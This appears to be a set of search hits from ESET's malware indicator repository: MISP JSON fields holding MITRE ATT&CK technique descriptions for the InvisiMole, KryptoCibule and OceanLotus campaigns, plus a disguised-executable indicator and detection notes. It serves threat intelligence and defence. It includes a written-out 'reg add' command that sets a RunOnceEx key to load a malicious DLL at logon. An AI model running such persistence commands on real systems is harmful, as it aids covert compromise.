malware-ioc misp_invisimole.json "description": "Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically requires being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. \n\nAs an example, an adversary may weaponize Windows Shortcut Files (.lnk) to bait a user into clicking to execute the malicious payload.(Citation: Proofpoint TA505 June 2018) A malicious .lnk file may contain [PowerShell](https://attack.mitre.org/techniques/T1086) commands. Payloads may be included into the .lnk file itself, or be downloaded from a remote server.(Citation: FireEye APT29 Nov 2018)(Citation: PWC Cloud Hopper Technical Annex April 2017) \n\nWhile User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nThe <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit</code> and <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell</code> subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as Javascript.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n### Windows\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)\n\n* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.\n* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alertable state. A variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n### Mac and Linux\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n\n* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. \n\nIf one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nAn adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.", © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "Exploitation of Remote Services - T1210", © ESET 2014-2018
malware-ioc misp_invisimole.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Exploitation of Remote Services - T1210\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.", © ESET 2014-2018
malware-ioc misp_invisimole.json "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "Remote File Copy - T1105", © ESET 2014-2018
malware-ioc misp_invisimole.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Remote File Copy - T1105\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Command-line interfaces provide a way of interacting with computer systems and are a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).\n\nAdversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command <code>runas</code>.(Citation: Microsoft runas)\n \nAdversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAccess tokens can be leveraged by adversaries through three methods:(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\n**Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.\n\n**Create Process with a Token** - An adversary creates a new access token with <code>DuplicateToken(Ex)</code> and uses it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.\n\n**Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread.\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.\n\nMetasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges.(Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n### Mac\n\nOn OSX, the native command <code>screencapture</code> is used to capture screenshots.\n\n### Linux\n\nOn Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the <code>df -aH</code> command.\n\n### Cloud\n\nCloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)\n\nKeylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.\n\nAdversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)", © ESET 2014-2018
malware-ioc misp_invisimole.json "name": "misp-galaxy:mitre-attack-pattern=\"Exploitation of Remote Services - T1210\"", © ESET 2014-2018
malware-ioc misp_invisimole.json "name": "misp-galaxy:mitre-attack-pattern=\"Remote File Copy - T1105\"", © ESET 2014-2018
malware-ioc misp-kryptocibule.json "value": "%LocalAppData%\\Java Runtime\\transmission-remote.exe", © ESET 2014-2018
malware-ioc kryptocibule %LocalAppData%\Java Runtime\transmission-remote.exe © ESET 2014-2018
malware-ioc kryptocibule Java Runtime Update, in, allow, %LocalAppData%\Java Runtime\transmission-remote.exe © ESET 2014-2018
malware-ioc kryptocibule Java Runtime Update, out, allow, %LocalAppData%\Java Runtime\transmission-remote.exe © ESET 2014-2018
malware-ioc oceanlotus-macOS.misp.event.json "remote-service-effects"], © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n===Windows===\n\nExample utilities used to obtain this information are <code>dir<\/code> and <code>tree<\/code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n===Mac and Linux===\n\nIn Mac and Linux, this kind of discovery is accomplished with the <code>ls<\/code>, <code>find<\/code>, and <code>locate<\/code> commands.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.\n\nDetection: Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters\n\nDefense Bypassed: Host forensic analysis\n\nPermissions Required: User, Administrator, SYSTEM\n\nContributors: Bartosz Jerzman, Travis Smith, Tripwire", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. \n\nAdversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.\n\nDetection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nEffective Permissions: SYSTEM\n\nPermissions Required: Administrator, SYSTEM", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nPermissions Required: User, Administrator, SYSTEM", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.\n\nDetection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to 